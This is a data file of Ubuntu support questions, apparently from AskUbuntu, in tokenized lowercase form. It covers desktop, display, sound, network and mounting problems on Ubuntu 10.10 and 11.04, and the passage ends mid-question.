39366	how can i quickly and cleanly kill a print job ?	on occasion , i 've tried to kill a print job started in error , to avoid a waste of paper and toner . i know there are several layers to the printing system in use , and the gui printer queue applet is not particularly responsive . what 's the quickest way to kill and purge a print job ?
39369	launcher not hiding	when i connect using nx ( nomachine 's ; not freenx ) , the launcher stays there , on top of open windows . i have n't been able to close it at all . locally ( with full unity instead of unity-2d , that is ) , it works without problems . any ideas ?
39371	how to write a script to change the screen ?	in my office , i am connecting an external monitor to my laptop . the problem is when i switch to the external monitor and disconnect it , it does n't automatically switch back to my laptop 's screen and i can not work with my laptop so i should restart it . is there a way to fix it ? this was the problem that i have with maverick . now with natty it 's even worse . sometimes when i connect the monitor i do n't see anything on neither of them and when i disconnect the monitor , i just see the mouse cursor on my laptop 's screen with a black background . it would be very nice if i can change the monitor with a script or something .
39376	is it possible to add a quicklist to the libreoffice writer icon in the launcher showing my most recently opened documents ?	is it possible to add a quicklist to the libreoffice writer icon in the unity launcher showing my most recently opened documents ?
39381	sound jitters and gets back to normal	i use usb output for sound . since updating to 11.04 i have witnessed the following problem , which many other users , as described in bug # 761312 , also experience : for a while i can watch a flash video or listen to music from banshee perfectly fine . in a seemingly random moment the sound starts getting jittery - i.e . a hissing background noise / white noise appears - getting constantly worse , until being totally unusable . when the sound goes bad , it does so across both flash and banshee . as many others have described it does not matter was player you are using and it is not gstreamer specific either , as it also occurs with xine etc . i have tried killing the pulseaudio process to no help . i pause whatever is playing and after some time the sound starts working again . strangely , when the problem occurs and i set my sound output to mono , the problem goes away for a short time , but then starts to jitter again fairly quickly . i have tried google with no luck and i have not changed any sound settings since upgrading from 10.10 the problem in still present in oneiric .
39382	where can i find websites that list games for ubuntu ?	this question is present as a matter of historical interest . while you are encouraged to help maintain its answers , please understand that `` big list '' questions are not generally allowed on askubuntu and will be closed per the faq . not all games are in the software center and i do n't know where to find others . please help me find websites online that list games for ubuntu . i do n't mind if they are free or not . i do n't want recommendations of individual games - just link me to the lists/websites that surely must exist already somewhere ... playonlinux is n't a site where i can find games , it 's a tool for installing windows based games in ubuntu . i do n't want the source code of a game either . i like the answers from rinzwind , alan and cyrex more of those please .
39384	use upstart to umount nfs at shutdown/restart ?	i want to umount nfs drive at shutdown/restart . i connect to it with my laptop , and due to known bug , the system shuts down for ten minutes , instead for 20 seconds , when the nfs is mounted . i used to umount it in maverick with k02umount script in /etc/rc0.d and rc6.d but after the upgrade , it does not seem to work anymore . so , i try to write an upstart job , which will do it for me i tried # start on stopping network start on net-device-down iface ! =lo task # i tried with start on runlevel [ ! 2345 ] , too script exec /home/deckoff/desktop/umount end script umount is umount /media/mybooklive and will work ok , when executed manually it seems this i sneer executed on shutdown or restart . i want to find a way to find event , that will be early enough , so the script has enough execute . i read that the problem is because the network is down before unmount , so unmount is killed by timeout . i look for even that will happen before the network disconnect . manually disconnecting actually does the trick ... could this bug be actually responsible for my troubles ?
39386	no access to encrypted partition after failed distro upgrade	i had an ubuntu 10.10 encrypted ( dm-crypt ) installation on my pc . today i did the distro upgrade to 11.04 , but the upgrade failed . there are no working system on my pc anymore . how can i now access data on my encrypted /home partition ? i remember my password exactly , but i do n't have that hash , wich was generated on setup of that 10.10 encrypted installation . in livecd session , it asks for password , but it wount work - no access .
39391	adjusting brightness on dell vostro 3500 wo n't work	on a fresh install of ubuntu 11.04 , running unity , i ca n't adjust the brightness via fn+up/down . the brightness panel will show , and increase/decrease accordingly , but the actual brightness never changes . this is an issue i also had on 10.04 . i used to fix this by adding this line option `` registrydwords '' `` enablebrightnesscontrol=1 '' to my /etc/xorg/xorg.conf in section `` device '' . however it seems this is not working anymore . i also noticed the config file is much smaller that what i remember . here is the whole file : section `` device '' identifier `` default device '' option `` nologo '' `` true '' option `` registrydwords '' `` enablebrightnesscontrol=1 '' endsection should i use this line somewhere else ? or is there something else to fix ? for reference , here is the original issue on 10.04 : https : //answers.launchpad.net/ubuntu/+source/xserver-xorg-video-nv/+question/109012
39392	why are translations getting updated when there are no modifications to them ?	i have a branch in launchpad that 's set to automatically import translations to the branch . however , i noticed that there have been a lot of 'useless commits ' lately where the translation files would be updated even though there were no changes to them . for example , this revision : fr.po:17 - `` x-launchpad-export-date : 2011-05-01 05:32+0000\n '' + `` x-launchpad-export-date : 2011-05-02 05:32+0000\n '' why are the translations getting updated when there are no actual changes ? notice on this page that the modification times are for last year :
39394	change icon of wine application in unity launcher	i frequently run a windows program with wine . when i open this program it shows up in the unity launcher as wine instead of the actual opened program . i have made a desktop launcher with the right icon but dragging this to the unity launcher reverts the icon back to the wineglass icon . when starting the application it 's denominated as wine windows program loader instead of its actual name . screenshot :
39399	custom desktop launchers not sticking after restart in unity 2d panel	i have a handful of customer launchers that i 'd like to place in the unity 2d launcher . i have created them as desktop configuration files , and stored them in a shortcuts folder . when i click on these from nautilus , they work fine . if i drag them to the unity launcher , they work properly . if i reboot , they do n't stay in the panel . how do i get them to be remembered ?
39401	how to install 10.10 to an external hard drive	i recently got a used external hard drive from a relative , and decided that i would like to have a fresh system around , so i can program , etc . without all of my junk around . i downloaded the 10.10 installer , and burned it to a dvd . when i go through the installer , i do n't find an option to switch which disk ubuntu gets installed on , as in 10.04 . is this gone , and i need to use the long , complicated scripts that i am unable to use , as i do n't have a working internet connection ? right now , all i want is to have a simple yes/no about whether the drop-down menu for installing to a different drive is gone , or instructions on finding it somewhere else . a link to alternate ( easy ) installation methods would be appreciated if the menu is gone . do n't think anyone will find this useful , but here is my setup : ubuntu 10.10 for ppc live cd emac western digital 160 gb enhanced ide hard drive ( model wd1600jb ) connected by firewire
39403	fans go in overdrive on my inspiron 9400 ! what should i do ?	after an update to 11.04 the fans of my inspiron 9400 go in overdrive and never lower speed . is this normal ? it did not happen on any of the other ubuntu releases .
39405	deeper unity search indexing	unity is currently only indexing and displaying a shallow set of file results . suppose i want to open the file `` /home/music/creedence clearwater revival/willy and the poor boys/the-midnight-special.mp3 '' . i open the `` files and folders '' lens and type `` the midnight special '' . unfortunately , the song does n't display . i try `` willy and the poor boys '' but that folder does n't display either . the only folder that does display in the lens is `` music '' . therefore i must open the `` music '' folder then navigate through the entire directory tree to open the file i want . how do i get a deeper index of files to display in the `` files and folders '' lens ? thanks for your help !
39411	touch screen and mouse not correctly functional on tablet	greetings , all . i have run ubuntu off a live usb stick on my tablet computer . however , the touch screen behaves erratically - in different ways for different versions , too . in version 10.10 , no presses are detected by the computer , unless i press with two fingers , at which point the cursor will jump to one of the fingers , but not click . in version 11.04 , the pointer moves with one finger but still does n't click . sometimes it clicks but only on a few controls . in both versions , plugging in a mouse did n't work - the mouse merely moves around , with clicks not at all being noticed . is there any software or things available to rectify this situation ? thanks in advance for any answers .
39412	how to show seconds on the clock in gnome 3 ?	is it possible to show the seconds on the clock in gnome 3 ?
39413	can not mount extra internal hard drive - error	all of a sudden i can no longer mount an internal hard drive ( /dev/sda aka openspacei ) via gui or cli . $ sudo mount /dev/sda /media/openspacei gives this error mount : wrong fs type , bad option , bad superblock on /dev/sda , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so gives this $ dmesg | tail [ 9344.234380 ] compiz [ 6098 ] : segfault at 28 ip 00007f1fa0641335 sp 00007fff0b306700 error 4 in libregex.so [ 7f1fa063c000+8000 ] [ 9987.879043 ] nautilus [ 6899 ] : segfault at 1505b817b60f ip 00007ff6eeefdb8d sp 00007fff09aa6170 error 4 in libgobject-2.0.so.0.2800.6 [ 7ff6eeeca000+4e000 ] [ 10001.231835 ] compiz [ 7360 ] : segfault at 28 ip 00007f38e0cfe335 sp 00007fff3228d380 error 4 in libregex.so [ 7f38e0cf9000+8000 ] [ 10113.817592 ] compiz [ 7429 ] : segfault at 28 ip 00007f01c11cd335 sp 00007fffac4f4250 error 4 in libregex.so [ 7f01c11c8000+8000 ] [ 10116.592022 ] compiz [ 7651 ] : segfault at 28 ip 00007f4369548335 sp 00007fffb3b2b030 error 4 in libregex.so [ 7f4369543000+8000 ] [ 10117.958485 ] compiz [ 7666 ] : segfault at 28 ip 00007f3861d7d335 sp 00007fff268395d0 error 4 in libregex.so [ 7f3861d78000+8000 ] [ 10366.207793 ] ext4-fs ( sda ) : bad geometry : block count 156282966 exceeds size of device ( 156282701 blocks ) [ 10855.975855 ] ext4-fs ( sdb ) : mounted filesystem with ordered data mode . opts : ( null ) [ 10863.666747 ] ext4-fs ( sda ) : bad geometry : block count 156282966 exceeds size of device ( 156282701 blocks ) [ 11125.922998 ] ext4-fs ( sda ) : bad geometry : block count 156282966 exceeds size of device ( 156282701 blocks ) any ideas ? should i check /etc/fstab for something ? gui error - http : //dl.dropbox.com/u/545099/error1.png
39414	asus 1018p disable touchpad while typing ?	how can i automatically disable the touchpad while i typing ?
39415	clicking on onboard steals dash 's focus	is there any way to stop clicks on onboard from closing dash ? i would like to be able to type in dash using onboard before it disappears . it even happens when focus prevention level setting in compiz is set to 'very high ' .
39419	can i downgrade from 11.04 to 8.04 without reformating	i have seen videos of people downgradiing other versions before but when i tried it on a laptop with 11.04 it failed and i had to reformat . i have another computer that i just dont want to go thru formating if at all possible .
39421	my ssh tunnels get interrupted because the host machine falls asleep . bug or feature ?	my gnome-power preference is set to automatically sleep after 30 minutes of inactivity . apparently it thinks that a ssh connection is not a valid reason to keep it alive . is this a feature or a bug ? i would like to keep my auto-suspend settings on yet have ssh give it a big fat `` no ! '' when a tunnel is active . i 'm running natty . here is my /etc/ssh/sshd_config file : # what ports , ips and protocols we listen for port 22 # use these options to restrict which interfaces/protocols sshd will bind to # listenaddress : : # listenaddress 0.0.0.0 protocol 2 # hostkeys for protocol version 2 hostkey /etc/ssh/ssh_host_rsa_key hostkey /etc/ssh/ssh_host_dsa_key hostkey /etc/ssh/ssh_host_ecdsa_key # privilege separation is turned on for security useprivilegeseparation yes # lifetime and size of ephemeral version 1 server key keyregenerationinterval 3600 serverkeybits 768 # logging syslogfacility auth loglevel info # authentication : logingracetime 120 permitrootlogin yes strictmodes yes rsaauthentication yes pubkeyauthentication yes authorizedkeysfile % h/.ssh/authorized_keys # do n't read the user 's ~/.rhosts and ~/.shosts files ignorerhosts yes # for this to work you will also need host keys in /etc/ssh_known_hosts rhostsrsaauthentication no # similar for protocol version 2 hostbasedauthentication no # uncomment if you do n't trust ~/.ssh/known_hosts for rhostsrsaauthentication # ignoreuserknownhosts yes # to enable empty passwords , change to yes ( not recommended ) permitemptypasswords no # change to yes to enable challenge-response passwords ( beware issues with # some pam modules and threads ) challengeresponseauthentication no # change to no to disable tunnelled clear text passwords passwordauthentication no # kerberos options # kerberosauthentication no # kerberosgetafstoken no # kerberosorlocalpasswd yes # kerberosticketcleanup yes # gssapi options # gssapiauthentication no # gssapicleanupcredentials yes x11forwarding yes x11displayoffset 10 printmotd no printlastlog yes tcpkeepalive yes # uselogin no # maxstartups 10:30:60 # banner /etc/issue.net # allow client to pass locale environment variables acceptenv lang lc_* subsystem sftp /usr/lib/openssh/sftp-server # set this to 'yes ' to enable pam authentication , account processing , # and session processing . if this is enabled , pam authentication will # be allowed through the challengeresponseauthentication and # passwordauthentication . depending on your pam configuration , # pam authentication via challengeresponseauthentication may bypass # the setting of `` permitrootlogin without-password '' . # if you just want the pam account and session checks to run without # pam authentication , then enable this but set passwordauthentication # and challengeresponseauthentication to 'no ' . usepam yes
39422	how to make a unity suggestion ?	i have some suggestions/ideas for unity - mainly some behavioral suggestions to make unity more intuitive . i 'm new to bug-reporting , etc . how do i go about suggesting something so that the unity developers see it ?
39430	how to go from 11.04 to 10.04	ok , so i was running fine on 10.04 then i thought `` why not upgrade to 11.04 '' so i did and a some bad stuff happened . once i boot or try install the screen goes very faint were you can not read the screen so i cant install , and when i do install i can use the os because i cant see what i 'm doing . so how can i go back to 10.04 ? will i just download the iso and burn it to a disc then use that or will i need to format first ? and if so , how ? sorry for being a no0b but i 'm without a pc and i need it for coursework . ( i 'm using the live cd with `` try ubuntu without installing '' ) .
39435	are there plans for system-wide smooth scrolling ?	as ubuntu seems to be making strategic preparations for a tablet-like experience , i wondered what priority smooth scrolling is for the team . a use case : i read pdfs on a netbook on a daily basis . even with fullscreen , i have to scroll about every 10-15 seconds . without smooth scroll , i have to spend a half second or so to `` find '' my place . even though it seems like a small inconvenience , the increments add up quite fast . as a result , i look enviously at owners of a certain well-known tablet far too often . related bug : https : //bugs.launchpad.net/gtk/+bug/868510
39436	issue with 3 monitors	i have a fresh install of 11.04 ( reformatted etc ) and i am having problems with a 3rd monitor . i 'm running 2 video cards and the default nvidia drivers . i let the drivers generate my xorg.conf because still somewhat a n00b : ) i have no issue with the 2 working monitors . they are setup as twinview which may or may not be best but i would prefer to avoid running xinerama because i fear i would no longer be able to use unity . long story short , no known issues with the 2 monitors that are on the same video card . the 3rd monitor appears to have no window manager . i have no launch bar , no panels and when i right click - > new file gedit opens and there are no file / edit / tools ... options , nor is the title bar visible ( with close , minimize , maximize ) . if i try to write anything in the text editor , it writes the text to one of the other , working , screens ( almost as if the window on the 3rd monitor never receives focus ) . my xorg.conf file is posted below -- please let me know of any other files that would be helpful . i really appreciate any advice ! # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 270.29 ( buildd @ roseapple ) fri feb 25 14:43:24 utc 2011 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' rightof `` screen1 '' screen 1 `` screen1 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` proview/emc/pts '' horizsync 30.0 - 80.0 vertrefresh 60.0 - 75.0 option `` dpms '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor1 '' vendorname `` unknown '' modelname `` dell e1910h '' horizsync 30.0 - 83.0 vertrefresh 56.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 9400 gt '' busid `` pci:1:0:0 '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 8400 gs '' busid `` pci:5:0:0 '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 1 '' option `` twinviewxineramainfoorder '' `` crt-0 '' option `` metamodes '' `` crt-0 : nvidia-auto-select +0+0 , crt-1 : nvidia-auto-select +1280+0 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` twinview '' `` 0 '' option `` twinviewxineramainfoorder '' `` crt-0 '' option `` metamodes '' `` nvidia-auto-select +0+0 ; 1366x768 +0+0 '' subsection `` display '' depth 24 endsubsection endsection the screen that is giving me problems looks a bit like this ...
39442	what 's the difference between virtual and nonvirtual workspaces ?	in ccsm/general options/desktop size , there are three options : vertical virtual size , horizontal virtual size , and number of desktops . changing the first two options changes the number of workspaces i can switch between . what does number of desktops do ? it does n't seem to change anything when i move the slider .
39443	restore rearranging programs on taskbar in classic mode ?	in previous versions of ubuntu , i 've enjoyed being able to rearrange the programs on the bottom task bar . now , in 11.04 's `` classic '' desktop , i do n't seem to be able to do that any longer . is there a way to restore this functionality ? some hidden gconf setting ? or has this been removed from the code entirely ? for example , here i am trying to drag firefox onto evolution . in 10.10 and previous , this would have caused the two apps to swap places on the window list .
39444	what 's the visual difference between unity 3d and unity 2d ?	the answer to this question ( how can i tell if i am running 2d or 3d unity ? ) does n't show the visual differences between unity 3d and 2d . if i have followed the instructions , where can i see which unity i 'm running ?
39446	why does n't my alt+f2 work ?	i just noticed that my alt+f2 no longer works in ubuntu classic . it was working fine just yesterday when i restored gnome-panel after not liking awn . how can i fix this ?
39459	how do i get the computertemp applet working ?	this is a little different than the common natty temperature applet question . i 've given unity a shot and have reverted back to ubuntu classic . the one thing that is still not working is the temperature panel indicator ( on 2 different laptops ) . it reports 'no thermal monitor support ' and shows a big red 'x ' . the temperature sensors are working as gkrellm can still report temperature properly . does anyone have a solution ? the specific applet is the 'computertemp ' applet . after jorge asked for more details , i tried the other one , the 'sensors-applet ' , and it actually works correctly .
39461	suspend to ram stopped usb speakers	i use a teufel c 200 usb system on natty , which worked fine with mavarick and natty so far . a couple minutes ago , i did a suspend to ram , woke the computer up a little later and the speakers to not play anything anymore . i tried maxing everything in the `` sound '' menu in system settings , tried alsamixer and pavucontrol , everything is at 100 % and the usb device is selected . the system was restarted twice after that , so that should not be the issue . when i hook the same speakers to my natty laptop , i can just select them as the audio device and music plays . how can i fix this ?
39462	how do i reconfigure keyboard shortcuts for copy and paste ?	i 've been looking all over the configuration menus and googling all over the web for how to configure keyboard shortcuts for copy and paste in the unity window manager . is there some hidden place somewhere to configure this ? in gnome desktop on lucid , i had it configured so that using the ubuntu system keyboard/mouse , i could use win-c/win-v to copy and paste everywhere on the gnome desktop , including in firefox and gnome terminal ; then when i moved the mouse to my mac desktop* , the same keystrokes would copy and paste . i would really like to keep this consistency . ctrl-c is obviously inappropriate as the `` copy '' key in any sort of terminal program . ( any ctrl characters , actually . ) * i am doing this by running synergy server on ubuntu , and the synergy client on a macbook .
39466	how to set `` full graphics '' on 11.04	i could originally change the graphics to be really `` flashy '' on 10.10 but now there is no option to . the graphics driver is working fine also .
39472	how do i turn off effects so vnc can paint properly ?	on ubuntu 10 the vnc would not repaint unless you disabled the effects . by right clicking on the background and going to the effects tab then selecting `` no effects '' out of the three options of `` no effects '' , `` normal effects '' and `` advanced effects '' or something similar to that . now that unity is here , there does not seem to be an effects tab nor any place to choose from these three settings ? hence the vnc not working/repainting . also , if i boot into the ubuntu classic mode ( gnome ) the effects tab is not there either ! are the effect options hidden away somewhere ? or do they not exist any more , does it work another way now ? or is there a solutions to get vnc server running with the `` effects '' enabled ( the simple ones , previously known as `` standard effects '' or something along those lines , that come with the standard install ) ?
39474	how do you stop gnome shell adding a second icon to the launcher even though the application is already favourited ?	i 've been playing around with gnome shell for a while and every thing is smooth . so much so that my biggest gripe is to do with the way the launcher handles some of my applications . for most part , when an application is added to the launcher , i.e . added to favourites , and loaded , there will be only one instance of it shown in the launcher , with a white light shown under its icon . but that does n't seem to be the case for every application . a few , even though pinned to the launcher , show an additional icon once loaded . is there a solution for this ?
39475	how do you label a launcher icon which has no icon label	how do you label a launcher icon which has no icon label for example i added gtkpod but i have a black square where an icon should be . how do i add an icon ?
39477	grub-customizer ( how to fix your dual-boot in case you miss the right boot option )	have you ever installed grub-customizer ? yes , it 's a nice tool for rearrange our boot system and gain some extra space in the discs . very usefull though ! but , as i recomende that you install this usefull app , at the same time i advise you to be carefull , because any distraction and your dual boot simply could go away ! and how can we fix this as an easy way ? boot your cd ( as you did before ) with your ubuntu ( if you have latest version installed in your pc it does n't matter if you boot another version of ubuntu . if you have natty 11.04 you can simply use your 10.04 cd ... ) try the experiment mode ( you do n't need to install ubuntu again ! ) then install ( as you have made in your system ) grub-customizer packages ( sudo add-apt-repository ppa : danielrichter2007/grub-customizer & & sudo apt-get update ) in update manager select the option `` open source code software ( universal ) '' in the terminal again , install the repository packages ( sudo apt-get install grub-customizer ) acess to grub-customizer and select your root . then your boot option ( in case you have dual or triple boot ) will appear and you can select again and treat a big headache ... very simple . hope you liked it ! jorge
39478	why ca n't my wifi connect or disconnect ?	wifi connection might drop spontaneously or simply can not connect . users on ubuntu 10.04 and 11.04 have reported experiencing the problem . running dmesg would show : [ 210749.637705 ] wlan0 : deauthenticating from 00:23:89:48:3b : b0 by local choice ( reason=3 ) [ 210778.632244 ] wlan0 : deauthenticating from 00:23:89:48:3b : b0 by local choice ( reason=3 ) [ 210784.456359 ] wlan0 : deauthenticating from 00:23:89:82:75:70 by local choice ( reason=3 ) which is pretty cryptic . i have tried : kill -9 wpa_supplicant , but wpa_supplicant keeps getting restarted each time . also , some have suggested that this was caused by enabling power management . however , this might not be true , as the problem has presented itself in a situation where power management was disabled .
39483	twinview keeps the desktop stretched when external monitor removed	i have a hp laptop with an nvidia card , and i 'm using ubuntu 11.04 ( stable ) . i have set up twinview using the nvidia x server settings application . if i boot up without my secondary monitor plugged in , the desktop is stretched and out of resolution . unity and the main panel work and look normal , but any applications i run are also stretched and the resolution is wrong , making them virtually unusable . when i boot with my secondary monitor plugged in ( via hdmi ) everything is working fine . i 've drilled this down to my xorg.conf file . if i delete the file and restart , the primary monitor works fine but i need to configure nvidia to use twinview again . for a laptop where i 'm constantly switching between single and multiple monitors , this gets annoying ... so basically my question is : can i set up ubuntu in a way where the dual monitor settings are ignored when only 1 monitor is plugged in ? this worked fine in 10.10 ( btw i still have that xorg.conf file , and it causes the same issue ) . here is my current xorg.conf file : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 270.29 ( buildd @ allspice ) fri feb 25 14:42:07 utc 2011 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` seiko/epson '' horizsync 30.0 - 75.0 vertrefresh 60.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gt 230m '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 1 '' option `` metamodes '' `` dfp-0 : nvidia-auto-select +1920+0 , dfp-1 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection
39484	does ubuntu one offer a corporate account	i am interested in having all of our computers in our company syncing with ubuntu one . is there a corporate account program ?
39486	complete 11.04 desktop customization guide	are there any comprehensive desktop customization guide for 11.04 for novices like me ? thanks in advance .
39487	possible missing firmware /lib/firmware/rtl_nic/rtl8105e-1.fw for module r8169 with 2.6.39 kernel	i 've been getting an issue since upgrading to 2.6.39 in natty from the kernel-ppa repository . when i do a sudo update-initramfs -u i get the following error message . update-initramfs : generating /boot/initrd.img-2.6.39-0-generic-pae w : possible missing firmware /lib/firmware/rtl_nic/rtl8105e-1.fw for module r8169 i did notice that firmware was n't in the allocated directory . does anyone know where to get the firmware files for this .
39489	is there a way to turn off “auto-maximize” ?	in 11.04 windows sometimes start maximized or jump to maximized when they get de-minimized . this behaviour starts to get annoying to me . if i give a window a certain size—even if the window fills almost the entire screen—i want my os to respect that and not make it’s own assumption . is there a option to tell ubuntu to maximize windows only when i press the maximize button ?
39490	how can unity be made more friendly to multiple monitors on a laptop ?	when the laptop is connected to a new monitor while suspended ( which i do daily when i arrive home ) and woken up , the unlock screen works fine , but unity has several areas that are simply black . the mouse works in those areas , and super-w shows windows in the black areas , but nothing in them is clickable . the black area includes approximately a 100-pixel bar at the top of the primary monitor ( 1600x900 ) and the entire secondary monitor ( 1280x1024 ) . running `` unity -- replace '' at the alt-f2 prompt ( which i ca n't see , but works ) fixes it , but is there a way not to have to fix it each time ? screenshot below : the black under the primary ( left ) monitor is normal - they 're different heights . /var/log/xorg.0.log - http : //pastebin.ubuntu.com/603055/ lspci -nn | grep vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation core processor integrated graphics controller [ 8086:0046 ] ( rev 02 )
39491	alternative to panflute applet ?	i use audacious as my music player , and was using panflute applet to control the playback right from the superior menu bar . as i recently upgraded to natty narwhal , and it does n't support applets anymore , i can no longer use it . can you guys suggest something similar to this applet ( maybe there 's an indicator that controls media playback , but i could n't find it ) that works with natty ? here 's a screenshot of the applet :
39497	apt-get install multiple packages without stopping	i am making a bash script that installs various packages using apt-get install . however , i notice that if there is a line that says : sudo apt-get install package1 package2 package3 and either of the packages is not found , none of the others will be installed . how do i make it keep going even if it ca n't find one of the packages ? thanks in advance .
39500	how do i change default dash application for pictures/photos in unity ?	i 'd like to change the default application that is associated 'view photos ' on the dash . i can do the web and email ones via 'preferred applications ' , but not the photos one . is there a way to do this ?
39501	mp3 tags keep resetting	i 've got a ch3snas media server where i store all my mp3 's on and i use rhythmbox to play the files on my computer . i can adjust the info fine , no warnings but when i log back in the next time the information will have reset itself . my mount setup in fstab : //192.168.1.67/volume_1/media/music /media/music cifs rw , exec , auto , username=daniel4ing , password=******** , iocharset=utf8 0 0 another issue i have is when i try to play the music files on my xbox 360 . where the information seems to be different then what i 've tried to fill in and what i actually see when loading the files into rhythmbox . i 've been trying a lot of different things over the last few years and this is a problem i just ca n't seem to fix and it 's driving me crazy ! i 've tried editing with pretty much every single editor around . so my guess is that i 'm doing something wrong while mounting but it seems to be working fine for all my other media files like photos and movies .
39508	how do you solve the problem of a laptop 's inability to detect wireless networks ?	i recently installed ubuntu 11.04 to dual-boot with the windows xp in my dell™ inspiron e1505 laptop . unfortunately , i can only connect to our wireless network while in windows . in ubuntu , i ca n't go online unless i physically connect it to our cable modem . i am still a beginner , here is what i was able to get from searching online . here is my hardware : kalayaan001 @ kalayaan-mm061 : ~ $ lspci 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:01.0 pci bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express pci express root port ( rev 03 ) 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 01 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 01 ) 00:1c.3 pci bridge : intel corporation n10/ich 7 family pci express port 4 ( rev 01 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 01 ) 00:1f.2 ide interface : intel corporation 82801gbm/ghm ( ich7 family ) sata ide controller ( rev 01 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 01 ) 01:00.0 vga compatible controller : ati technologies inc radeon mobility x1400 03:00.0 ethernet controller : broadcom corporation bcm4401-b0 100base-tx ( rev 02 ) 03:01.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller 03:01.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 19 ) 03:01.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 0a ) 03:01.3 system peripheral : ricoh co ltd xd-picture card controller ( rev 05 ) 0b:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) i also checked the status of network manager : kalayaan001 @ kalayaan-mm061 : ~ $ nm-applet an instance of nm-applet is already running . ** ( nm-applet:1727 ) : warning ** : < warn > constructor ( ) : could n't initialize the d-bus manager . how can we initialize the d-bus manager ? kalayaan001 @ kalayaan-mm061 : ~ $ nm-tool networkmanager tool state : disconnected - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : b44 state : unavailable default : no hw address : 00:19 : b9:85:01 : ca capabilities : carrier detect : yes speed : 10 mb/s wired properties carrier : off it seems that all it can detect are the devices of wired internet . how can we make it recognize the devices for wireless ? i then checked for blocks , but found none . kalayaan001 @ kalayaan-mm061 : ~ $ rfkill list 0 : dell-wifi : wireless lan soft blocked : no hard blocked : no so , i thought it to be a driver problem and , surely enough , i found in `` additional drivers '' that it was lacking in a broadcom® sta wireless driver . unfortunately , getting the driver did n't fix it , either . it still can not detect anything . how is this fixed ? *」ר_ please , assist ! _γl* thank you for your time . take care , kalayaan 001 response to sagarchalise : i installed all 4 entries under the keyword `` bcm4311 '' : firmware-b43-installer , bcmwl-kernel-source , broadcom-sta-common , and broadcom-sta-source . ( there is even b43-fwcutter , though that appears for the broader keywork `` bcm '' . ) the problems is still there . additional drivers reports : `` this driver is activated and currently in use . '' here is ifconfig : kalayaan001 @ kalayaan-mm061 : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:19 : b9:85:01 : ca up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:12 errors:0 dropped:0 overruns:0 frame:0 tx packets:12 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:720 ( 720.0 b ) tx bytes:720 ( 720.0 b ) here is iwconfig : kalayaan001 